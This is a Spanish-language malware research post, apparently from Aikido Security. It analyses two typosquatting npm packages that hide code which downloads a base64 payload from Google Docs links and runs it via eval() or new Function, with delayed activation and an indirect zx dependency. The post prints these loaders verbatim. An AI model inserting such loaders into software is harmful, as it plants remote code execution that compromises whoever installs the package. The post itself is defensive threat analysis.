Producto
Todo lo que necesita para proteger el código, la nube y el tiempo de ejecución en un sistema centralizado
Código
Dependencias
Prevenir los riesgos del código abierto (SCA)
Secretos
Ser marcado por secretos expuestos
SAST
Código seguro tal como está escrito
Imágenes de contenedores
Crear imágenes seguras
Malware
Prevenir los ataques a la cadena de suministro
IaC
Buscar errores de configuración en IaC
Riesgo de licencia y SBOM
Evitar riesgos, cumplir la normativa
Software obsoleto
Conozca sus tiempos de ejecución EOL
Nube
CSPM
Desconfiguraciones de la nube
DAST
Pruebas de seguridad de caja negra
Exploración de API
Pruebe sus API en busca de vuln
Máquinas virtuales
Sin agentes ni gastos generales
Tiempo de ejecución de Kubernetes
pronto
Proteja sus cargas de trabajo en contenedores
Inventario en la nube
pronto
Solución a la proliferación de nubes
Defienda
Protección en tiempo de ejecución
Cortafuegos en la aplicación / WAF
Características
AI AutoFix
Arreglos en 1 clic con Aikido AI
CI/CD Seguridad
Escaneado antes de la fusión y el despliegue
Integraciones IDE
Obtenga información instantánea mientras codifica
Escáner local
Escaneado local centrado en el cumplimiento
Soluciones
Casos prácticos
Conformidad
Automatice SOC 2, ISO y más
Gestión de vulnerabilidades
Gestión de vulnerabilidades todo en uno
Proteja su código
Seguridad avanzada del código
Generar SBOM
1 clic Informes SCA
ASPM
AppSec de extremo a extremo
IA en el Aikido
Deja que Aikido AI haga el trabajo
Bloque 0-Días
Bloquee las amenazas antes del impacto
Industrias
FinTech
HealthTech
HRTech
Tecnología jurídica
Empresas del grupo
Agencias
Startups
Empresa
Aplicaciones móviles
Fabricación
Precios
Recursos
Desarrollador
Docs
Cómo utilizar el Aikido
Documentación pública sobre la API
Centro de desarrollo del aikido
Registro de cambios
Vea lo que se ha enviado
Seguridad
Investigación interna
Inteligencia sobre malware y CVE
Glosario
Guía de la jerga de seguridad
Centro de confianza
Seguro, privado, conforme
Código abierto
Aikido Intel
Amenazas de malware y OSS
Zen
Protección cortafuegos integrada en la aplicación
OpenGrep
Motor de análisis de código
Integraciones
IDEs
Sistemas CI/CD
Nubes
Sistemas Git
Conformidad
Mensajeros
Gestores de tareas
Más integraciones
Acerca de
Acerca de
Acerca de
Conozca al equipo
Carreras profesionales
Estamos contratando
Dossier de prensa
Descargar activos de marca
Calendario
¿Nos vemos?
Código abierto
Nuestros proyectos de OSS
Blog
Las últimas entradas
Historias de clientes
La confianza de los mejores equipos
Póngase en contacto con
Inicio de sesión
Empezar gratis
No se requiere CC
Aikido
Menú
Aikido
ES
ES
FR
JP
Inicio de sesión
Empezar gratis
No se requiere CC
Blog
/
Esconderse y fallar: Malware ofuscado, cargas útiles vacías y travesuras de npm

Esconderse y fallar: Malware ofuscado, cargas útiles vacías y travesuras de npm

Por
Charlie Eriksen
Charlie Eriksen
4 min leer
Malware

‍

El 14 de marzo de 2025, detectamos un paquete malicioso en npm llamado node-facebook-messenger-api. Al principio, parecía un malware bastante corriente, aunque no podíamos saber cuál era su objetivo final. No pensamos mucho más en ello hasta el 3 de abril de 2025, cuando vimos que el mismo actor de amenazas ampliaba su ataque. Este es un breve resumen de las técnicas utilizadas por este atacante específico, y algunas observaciones divertidas sobre cómo sus intentos de ofuscación en realidad terminan haciéndolos aún más obvios. 

‍

TLDR 

  • 🕵️ On 14 de marzo de 2025detectamos un paquete npm malicioso: node-facebook-messenger-api@4.1.0disfrazado como una envoltura legítima de Facebook Messenger.
  • 🧪 El atacante se escondió lógica de ejecución remota de código utilizando axios y eval() para extraer una carga útil de un enlace de Google Docs, pero el archivo estaba vacío.
  • 🔁 Las versiones posteriores utilizaban ejecución diferida y cambié el zx para evitar su detección, incrustando lógica maliciosa que se activa días después de su publicación.
  • 📦 On 3 de abril de 2025el mismo actor de la amenaza lanzó un segundo paquete falso: node-smtp-mailer@6.10.0haciéndose pasar por nodemailercon la misma lógica y ofuscación de C2.
  • 🧬 Ambos paquetes utilizaron el mismo conjunto único de dependencias (incluyendo hipertipos), revelando una clara patrón de firma vinculando los ataques.
  • Los intentos de ofuscación del atacante, como ocultar el código en archivos de gran tamaño e introducir silenciosamente zx a través de otra dependencia, hicieron que la campaña fuera más fácil de detectar.
  • 🚨 Las cargas útiles en realidad nunca entregaron nada funcional, pero los TTP son reales y muestran cómo están evolucionando los ataques a la cadena de suministro en npm.
  • ‍

    Primeros pasos

    Todo empezó el 14 de marzo a las 04:37 UTC, cuando nuestros sistemas nos alertaron de un paquete sospechoso. Fue publicado por el usuario victor.ben0825que también afirma tener el nombre perusworld. Este es el nombre de usuario del usuario propietario del repositorio legítimo para esta biblioteca.  

    ‍

    Este es el código que detectó como malicioso en node-facebook-messenger-api@4.1.0:en el archivo messenger.js, línea 157-177:

    const axios = require('axios');
    
    const url = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    
    async function downloadFile(url) {
        try {
            const response = await axios.get(url, {
                responseType: 'arraybuffer'
            });
    
            const fileBuffer = Buffer.from(response.data);
    		eval(Buffer.from(fileBuffer.toString('utf8'), 'base64').toString('utf8'))
            
            return fileBuffer; 
        } catch (error) {
            console.error('Download failed:', error.message);
        }
    }
    
    downloadFile(url);
    

    El atacante ha tratado de ocultar este código dentro de un archivo de 769 líneas de largo, que es una clase grande. Aquí han añadido una función, y la están llamando directamente. Muy bonito, pero también muy obvio. Intentamos obtener el payload, pero estaba vacío. Lo marcamos como malware y seguimos adelante.

    Unos minutos después, el atacante lanzó otra versión, la 4.1.1. El único cambio parecía estar en el LÉAME.md y paquete.json donde cambiaron la versión, la descripción y las instrucciones de instalación. Como marcamos al autor como autor malintencionado, los paquetes a partir de este punto se marcaron automáticamente como malware.

    Intentando ser sigiloso

    Entonces, el 20 de marzo de 2025 a las 16:29 UTC, nuestro sistema marcó automáticamente la versión 4.1.2 del paquete. Veamos las novedades. El primer cambio está en node-facebook-messenger-api.js, que contiene:

    "use strict";
    
    module.exports = {
        messenger: function () {
            return require('./messenger');
        },
        accountlinkHandler: function () {
            return require('./account-link-handler');
        },
        webhookHandler: function () {
            return require('./webhook-handler');
        }
    };
    
    var messengerapi = require('./messenger');

    El cambio en este archivo es la última línea. No es sólo importar el messenger.js cuando se solicita, siempre se hace cuando se importa el módulo. ¡Inteligente! El otro cambio es en ese archivo, messenger.js. Ha eliminado el código añadido visto anteriormente, y ha añadido lo siguiente en las líneas 197 a 219:

    const timePublish = "2025-03-24 23:59:25"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
    	async function setProfile(ft) {
    		try {
    			const mod = await import('zx');
    			mod.$.verbose = false;
    			const res = await mod.fetch(ft, {redirect: 'follow'});
    			const fileBuffer = await res.arrayBuffer();
    			const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
    			const nfu = new Function("rqr", data);
    			nfu(require)();
    		} catch (error) {
    			//console.error('err:', error.message);
    		}
    	}
    
    	const gd = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2'; 
    	setProfile(gd);
    }
    

    Aquí tienes un resumen de lo que hace:

    1. Utiliza una comprobación basada en el tiempo para determinar si se activa el código malicioso. Sólo se activaría unos 4 días después.
    2. En lugar de utilizar axiosahora utiliza Google zx para obtener la carga maliciosa.
    3. Desactiva el modo detallado, que también es el predeterminado.
    4. A continuación, obtiene el código malicioso
    5. Lo decodifica en base64
    6. Crea una nueva Función utilizando el Función() que equivale a un constructor eval() llamar. 
    7. A continuación, llama a la función, pasando requiere como argumento.

    ‍

    Pero de nuevo, cuando tratamos de obtener el archivo, no obtenemos una carga útil. Sólo obtenemos un archivo vacío llamado info.txt. El uso de zx es curioso. Miramos las dependencias, y nos dimos cuenta de que el paquete original contenía algunas dependencias:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    El paquete malicioso contiene lo siguiente:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    Fíjate, han añadido los hipertipos de dependencia. Muy interesante, volveremos a esto unas cuantas veces más. 

    ¡Han vuelto a atacar!

    Entonces, el 3 de abril de 2025 a las 06:46, un nuevo paquete fue liberado por el usuario cristr. Han publicado ele paquete  node-smtp-mailer@6.10.0. Nuestros sistemas lo marcaron automáticamente por contener código potencialmente malicioso. Lo miramos y nos emocionamos un poco. El paquete pretende ser nodemailer, sólo que con un nombre diferente.  

    Nuestro sistema marcó el archivo lib/smtp-pool/index.js. Rápidamente vemos que el atacante ha añadido código en la parte inferior del archivo legítimo, justo antes de la parte final módulo.exportaciones. Esto es lo que se añade:

    const timePublish = "2025-04-07 15:30:00"; 
    const now = new Date();
    const pbTime = new Date(timePublish);
    const delay = pbTime - now;
    
    if (delay <= 0) {
        async function SMTPConfig(conf) {
            try {
                const mod = await import('zx');
                mod.$.verbose = false;
                const res = await mod.fetch(conf, {redirect: 'follow'});
                const fileBuffer = await res.arrayBuffer();
                const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
                const nfu = new Function("rqr", data);
                nfu(require)();
            } catch (error) {
                console.error('err:', error.message);
            }
        }
    
        const url = 'https://docs.google.com/uc?export=download&id=1KPsdHmVwsL9_0Z3TzAkPXT7WCF5SGhVR'; 
        SMTPConfig(url);
    }
    

    ¡Conocemos este código! De nuevo está marcado para ejecutarse 4 días después. Intentamos obtener la carga útil, pero sólo recibimos un archivo vacío llamado principiante.txt. ¡Booo! Miramos las dependencias de nuevo, para ver cómo están tirando en zx. Observamos que la legítima nodemailer paquete tiene no directo dependenciassólo devDependencias. Pero esto es lo que contiene el paquete malicioso:

     "dependencies": {
        "async": "^3.2.2",
        "debug": "^3.1.0",
        "hyper-types": "^0.0.2",
        "merge": "^2.1.1",
        "request": "^2.81.0"
      }

    ¿Ves alguna similitud entre este y el primer paquete que detectamos? Es la misma lista de dependencias. El paquete legítimo no tiene dependencias, pero el malicioso sí. El atacante simplemente copió la lista completa de dependencias del primer ataque a este. 

    ‍

    Dependencias interesantes

    ¿Por qué pasaron de utilizar axios a zx para hacer HTTP ¿Solicitudes? Sin duda, para evitar ser detectados. Pero lo interesante es que zx no es una dependencia directa. En su lugar, el atacante ha incluido hyper-types, que es un paquete legítimo del desarrollador lukasbach. 

    ‍

    Además del hecho de que el repositorio referenciado ya no existe, hay algo interesante que señalar aquí. Vea cómo hay 2 dependientes? Adivina quiénes son. 

    ‍

    Si el atacante hubiera querido realmente intentar ofuscar su actividad, es bastante tonto depender de un paquete del que son los únicos dependientes. 

    Palabras finales

    Aunque el agresor detrás de estos paquetes npm finalmente no consiguió entregar una carga útil funcional, su campaña pone de manifiesto la continua evolución de las amenazas a la cadena de suministro dirigidas al ecosistema JavaScript. El uso de la ejecución retardada, las importaciones indirectas y el secuestro de dependencias muestra un creciente conocimiento de los mecanismos de detección y una voluntad de experimentar. Pero también muestra cómo una seguridad operativa descuidada y la repetición de patrones pueden delatarles. Como defensores, es un recordatorio de que incluso los ataques fallidos son una valiosa fuente de inteligencia. Cada artefacto, truco de ofuscación y dependencia reutilizada nos ayuda a crear mejores capacidades de detección y atribución. Y, lo que es más importante, refuerza por qué la supervisión continua y la señalización automática de los registros de paquetes públicos ya no son opcionales, sino fundamentales.

    Escrito por Charlie Eriksen

    Investigador de malware

    Comparte:

    https://www.aikido.dev/blog/hide-and-fail-obfuscated-malware-and-npm-shenanigan

    Tabla de contenidos:
    Enlace de texto
    Comparte:
    Utilizar el teclado
    Utilice la tecla izquierda para navegar anterior en el control deslizante Aikido
    Utilice la tecla de flecha derecha para pasar a la siguiente diapositiva
    para navegar por los artículos
    Por
    Charlie Eriksen

    Estás invitado: Entrega de malware a través de invitaciones de Google Calendar y PUAs

    Malware
    13 de mayo de 2025
    Seguir leyendo
    Por
    Mackenzie Jackson

    Por qué es tan difícil actualizar las imágenes base de los contenedores (y cómo hacerlo más fácil)

    Ingeniería
    12 de mayo de 2025
    Seguir leyendo
    Por
    Charlie Eriksen

    RATatouille: Una receta maliciosa oculta en rand-user-agent (Compromiso de la cadena de suministro)

    6 de mayo de 2025
    Seguir leyendo
    Por
    Charlie Eriksen

    Ataque a la cadena de suministro de XRP: Paquete oficial de NPM infectado con backdoor de robo de criptomonedas

    Malware
    22 de abril de 2025
    Seguir leyendo
    Por
    Charlie Eriksen

    La guía de citas del malware: Comprender los tipos de malware en NPM

    Malware
    10 de abril de 2025
    Seguir leyendo
    Por
    Madeline Lawrence

    Lanzamiento del malware Aikido - Open Source Threat Feed

    Noticias
    31 de marzo de 2025
    Seguir leyendo
    Por
    Charlie Eriksen

    Malware oculto a plena vista: Espiando a los hackers norcoreanos

    31 de marzo de 2025
    Seguir leyendo
    Por
    El equipo de Aikido

    Principales herramientas de gestión de la postura de seguridad en la nube (CSPM) en 2025

    Guías
    27 de marzo de 2025
    Seguir leyendo
    Por
    Madeline Lawrence

    Obtenga el TL;DR: tj-actions/changed-files Ataque a la cadena de suministro

    Noticias
    16 de marzo de 2025
    Seguir leyendo
    Por
    Mackenzie Jackson

    Lista de comprobación de seguridad de Docker para desarrolladores preocupados por la vulnerabilidad

    Guías
    6 de marzo de 2025
    Seguir leyendo
    Por
    Mackenzie Jackson

    Detección y bloqueo de ataques de inyección SQL en JavaScript

    Guías
    4 de marzo de 2025
    Seguir leyendo
    Por
    Floris Van den Abeele

    ¿Prisma y PostgreSQL vulnerables a la inyección NoSQL? Un sorprendente riesgo de seguridad explicado

    Ingeniería
    14 de febrero de 2025
    Seguir leyendo
    Por
    El equipo de Aikido

    Principales herramientas de pruebas dinámicas de seguridad de las aplicaciones (DAST) en 2025

    Guías
    12 de febrero de 2025
    Seguir leyendo
    Por
    Willem Delbare

    Lanzamiento de Opengrep | Por qué hemos bifurcado Semgrep

    Noticias
    24 de enero de 2025
    Seguir leyendo
    Por
    Tomás Segura

    Su cliente necesita un parche de vulnerabilidad NIS2. ¿Y ahora qué?

    14 de enero de 2025
    Seguir leyendo
    Por
    Mackenzie Jackson

    Las 10 mejores herramientas SAST basadas en IA en 2025

    Guías
    10 de enero de 2025
    Seguir leyendo
    Por
    Madeline Lawrence

    Snyk vs Aikido Security | G2 Comentarios Snyk Alternativa

    Guías
    10 de enero de 2025
    Seguir leyendo
    Por
    Mackenzie Jackson

    Las 10 principales herramientas de análisis de la composición del software (SCA) en 2025

    Guías
    9 de enero de 2025
    Seguir leyendo
    Por
    Michiel Denis

    3 pasos clave para reforzar el cumplimiento y la gestión de riesgos

    27 de diciembre de 2024
    Seguir leyendo
    Por
    Mackenzie Jackson

    Guía de código abierto sobre seguridad de las aplicaciones para startups

    Guías
    23 de diciembre de 2024
    Seguir leyendo
    Por
    Madeline Lawrence

    Lanzamiento de Aikido para Cursor AI

    Ingeniería
    13 de diciembre de 2024
    Seguir leyendo
    Por
    Mackenzie Jackson

    Conoce a Intel: La fuente de amenazas de código abierto de Aikido impulsada por LLM.

    Ingeniería
    13 de diciembre de 2024
    Seguir leyendo
    Por
    Johan De Keulenaer

    Aikido se une a la red de socios de AWS

    Noticias
    26 de noviembre de 2024
    Seguir leyendo
    Por
    Mackenzie Jackson

    Inyección de comandos en 2024 desempaquetada

    Ingeniería
    24 de noviembre de 2024
    Seguir leyendo
    Por
    Mackenzie Jackson

    Path Traversal en 2024 - El año desempacado

    Ingeniería
    23 de noviembre de 2024
    Seguir leyendo
    Por
    Mackenzie Jackson

    Equilibrar la seguridad: Cuándo aprovechar las herramientas de código abierto frente a las comerciales

    Guías
    15 de noviembre de 2024
    Seguir leyendo
    Por
    Mackenzie Jackson

    El estado de la inyección SQL

    Guías
    8 de noviembre de 2024
    Seguir leyendo
    Por
    Michiel Denis

    La seguridad de Visma aumenta con el aikido: Conversación con Nikolai Brogaard

    Noticias
    6 de noviembre de 2024
    Seguir leyendo
    Por
    Michiel Denis

    Seguridad en FinTech: Entrevista con Dan Kindler, cofundador y Director Técnico de Bound

    Noticias
    10 de octubre de 2024
    Seguir leyendo
    Por
    Félix Garriau

    Las 7 mejores herramientas ASPM en 2025

    Guías
    1 de octubre de 2024
    Seguir leyendo
    Por
    Madeline Lawrence

    Automatice el cumplimiento con SprintoGRC x Aikido

    Noticias
    11 de septiembre de 2024
    Seguir leyendo
    Por
    Félix Garriau

    Cómo crear un SBOM para auditorías de software

    Guías
    9 de septiembre de 2024
    Seguir leyendo
    Por
    Madeline Lawrence

    SAST vs DAST: Lo que hay que saber.

    Guías
    2 de septiembre de 2024
    Seguir leyendo
    Por
    Félix Garriau

    Las mejores herramientas SBOM para desarrolladores: Nuestras 2025 elegidas

    Guías
    7 de agosto de 2024
    Seguir leyendo
    Por
    Lieven Oosterlinck

    5 alternativas a Snyk y por qué son mejores

    Noticias
    5 de agosto de 2024
    Seguir leyendo
    Por
    Madeline Lawrence

    Por qué estamos encantados de colaborar con Laravel

    Noticias
    8 de julio de 2024
    Seguir leyendo
    Por
    Félix Garriau

    110.000 sitios afectados por el ataque a la cadena de suministro Polyfill

    Noticias
    27 de junio de 2024
    Seguir leyendo
    Por
    Félix Garriau

    Puntos esenciales de ciberseguridad para las empresas de tecnología jurídica

    Noticias
    25 de junio de 2024
    Seguir leyendo
    Por
    Roeland Delrue

    Integración de Drata - Cómo automatizar la gestión técnica de vulnerabilidades

    Guías
    18 de junio de 2024
    Seguir leyendo
    Por
    Joel Hans

    Guía DIY: Cree o compre su kit de herramientas de seguridad de aplicaciones y escaneado de código OSS

    Guías
    11 de junio de 2024
    Seguir leyendo
    Por
    Roeland Delrue

    Certificación SOC 2: 5 cosas que hemos aprendido

    Guías
    4 de junio de 2024
    Seguir leyendo
    Por
    Joel Hans

    Los 10 principales problemas de seguridad de las aplicaciones y cómo protegerse

    Guías
    28 de mayo de 2024
    Seguir leyendo
    Por
    Madeline Lawrence

    Acabamos de recaudar 17 millones de dólares de la Serie A

    Noticias
    2 de mayo de 2024
    Seguir leyendo
    Por

    Las mejores herramientas RASP para desarrolladores en 2025

    10 de abril de 2024
    Seguir leyendo
    Por
    Willem Delbare

    Lista de comprobación de la seguridad de los webhooks: Cómo crear webhooks seguros

    Guías
    4 de abril de 2024
    Seguir leyendo
    Por
    Willem Delbare

    La cura para el síndrome de fatiga por alerta de seguridad

    Ingeniería
    21 de febrero de 2024
    Seguir leyendo
    Por
    Roeland Delrue

    NIS2: ¿A quién afecta?

    Guías
    16 de enero de 2024
    Seguir leyendo
    Por
    Roeland Delrue

    Certificación ISO 27001: 8 cosas que hemos aprendido

    Guías
    5 de diciembre de 2023
    Seguir leyendo
    Por
    Roeland Delrue

    Cronos Group elige a Aikido Security para reforzar la seguridad de sus empresas y clientes

    Noticias
    30 de noviembre de 2023
    Seguir leyendo
    Por
    Bart Jonckheere

    Cómo Loctax utiliza Aikido Security para deshacerse de alertas de seguridad irrelevantes y falsos positivos

    Noticias
    22 de noviembre de 2023
    Seguir leyendo
    Por
    Félix Garriau

    Aikido Security recauda 5 millones de euros para ofrecer una solución de seguridad sin fisuras a las empresas SaaS en crecimiento

    Noticias
    9 de noviembre de 2023
    Seguir leyendo
    Por
    Roeland Delrue

    Aikido Security obtiene la certificación ISO 27001:2022

    Noticias
    8 de noviembre de 2023
    Seguir leyendo
    Por
    Félix Garriau

    Cómo el director de tecnología de StoryChief utiliza Aikido Security para dormir mejor por la noche

    Noticias
    24 de octubre de 2023
    Seguir leyendo
    Por
    Willem Delbare

    ¿Qué es un CVE?

    Guías
    17 de octubre de 2023
    Seguir leyendo
    Por
    Félix Garriau

    Mejores herramientas para la detección del final de la vida: Clasificación 2025

    Guías
    4 de octubre de 2023
    Seguir leyendo
    Por
    Willem Delbare

    Las 3 principales vulnerabilidades de seguridad de las aplicaciones web en 2024

    Ingeniería
    27 de septiembre de 2023
    Seguir leyendo
    Por
    Félix Garriau

    Nuevas funciones de seguridad de Aikido: Agosto 2023

    Noticias
    22 de agosto de 2023
    Seguir leyendo
    Por
    Félix Garriau

    Lista de comprobación de seguridad del CTO de SaaS 2025 de Aikido

    Noticias
    10 de agosto de 2023
    Seguir leyendo
    Por
    Félix Garriau

    Lista de comprobación de seguridad del CTO de SaaS 2024 de Aikido

    Noticias
    10 de agosto de 2023
    Seguir leyendo
    Por
    Félix Garriau

    Los directores de tecnología revelan los 15 principales retos de la seguridad del código y la nube

    Ingeniería
    25 de julio de 2023
    Seguir leyendo
    Por
    Willem Delbare

    ¿Qué es OWASP Top 10?

    Guías
    12 de julio de 2023
    Seguir leyendo
    Por
    Willem Delbare

    Cómo crear un panel de administración seguro para su aplicación SaaS

    Guías
    11 de julio de 2023
    Seguir leyendo
    Por
    Roeland Delrue

    Cómo prepararse para la norma ISO 27001:2022

    Guías
    5 de julio de 2023
    Seguir leyendo
    Por
    Willem Delbare

    Cómo evitar que pirateen su plataforma CI/CD

    Guías
    19 de junio de 2023
    Seguir leyendo
    Por
    Félix Garriau

    Cómo cerrar acuerdos más rápidamente con un informe de evaluación de la seguridad

    Noticias
    12 de junio de 2023
    Seguir leyendo
    Por
    Willem Delbare

    Automatizar la gestión técnica de vulnerabilidades [SOC 2]

    Guías
    5 de junio de 2023
    Seguir leyendo
    Por
    Willem Delbare

    Prevenir la contaminación de prototipos en su repositorio

    Guías
    1 de junio de 2023
    Seguir leyendo
    Por
    Willem Delbare

    ¿Cómo equilibra el director de tecnología de una startup SaaS la velocidad de desarrollo y la seguridad?

    Guías
    16 de mayo de 2023
    Seguir leyendo
    Por
    Willem Delbare

    Cómo la nube de una startup fue tomada por un simple formulario que envía correos electrónicos

    Ingeniería
    10 de abril de 2023
    Seguir leyendo
    Por
    Félix Garriau

    Aikido Security recauda 2 millones de euros para crear una plataforma de seguridad de software orientada a los desarrolladores

    Noticias
    19 de enero de 2023
    Seguir leyendo
    Por

    Por qué los archivos de bloqueo son importantes para la seguridad de la cadena de suministro

    Seguir leyendo
    Principales herramientas de gestión de la postura de seguridad en la nube (CSPM) en 2025
    Por
    El equipo de Aikido

    Principales herramientas de gestión de la postura de seguridad en la nube (CSPM) en 2025

    Guías
    14 de mayo de 2025
    Principales herramientas de pruebas dinámicas de seguridad de las aplicaciones (DAST) en 2025
    Por
    El equipo de Aikido

    Principales herramientas de pruebas dinámicas de seguridad de las aplicaciones (DAST) en 2025

    Guías
    14 de mayo de 2025
    Ataque a la cadena de suministro de XRP: Paquete oficial de NPM infectado con backdoor de robo de criptomonedas
    Por
    Charlie Eriksen

    Ataque a la cadena de suministro de XRP: Paquete oficial de NPM infectado con backdoor de robo de criptomonedas

    Malware
    31 de marzo de 2025

    Asegúrese en 32 segundos

    Conecta tu cuenta de GitHub, GitLab, Bitbucket o Azure DevOps para empezar a escanear tus repos gratis.

    Empezar gratis
    Tus datos no se compartirán - Acceso de sólo lectura
    Cuadro de mandos de Aikido
    Empresa
    ProductoPreciosAcerca deCarreras profesionalesPóngase en contacto conAsóciese con nosotros
    Recursos
    DocsDocumentos públicos sobre la APIBase de datos de vulnerabilidadesBlogIntegracionesGlosarioDossier de prensaOpiniones de los clientes
    Seguridad
    Centro de confianzaPanorama de la seguridadCambiar preferencias de cookies
    Legal
    Política de privacidadPolítica de cookiesCondiciones de usoContrato marco de suscripciónAcuerdo de procesamiento de datos
    Casos prácticos
    ConformidadSAST Y DASTASPMGestión de vulnerabilidadesGenerar SBOMSeguridad en WordPressProteja su códigoAikido para Microsoft
    Industrias
    Para HealthTechPara MedTechPara FinTechPara SecurityTechPara LegalTechPara HRTechPara las agenciasPara empresasPara PE y empresas del grupo
    Compara
    frente a todos los vendedoresvs Snykvs Wizcontra Mendvs Orca Securityvs Veracodevs GitHub Seguridad avanzadavs GitLab Ultimatevs Checkmarxfrente a Semgrepvs SonarQube
    Conectar
    hello@aikido.dev
    LinkedInX
    Suscríbase a
    Manténgase al día de todas las actualizaciones
    Aún no lo he conseguido.
    👋🏻 ¡Gracias! Te has suscrito.
    Equipo Aikido
    Aún no lo he conseguido.
    2025 Aikido Security BV | BE0792914919
    🇪🇺 Domicilio social: Coupure Rechts 88, 9000, Gante, Bélgica
    🇪🇺 Dirección de la oficina: Gebroeders van Eyckstraat 2, 9000, Gante, Bélgica
    🇺🇸 Dirección de la oficina: 95 Third St, 2nd Fl, San Francisco, CA 94103, EE.UU.
    SOC 2
    Conforme
    ISO 27001
    Conforme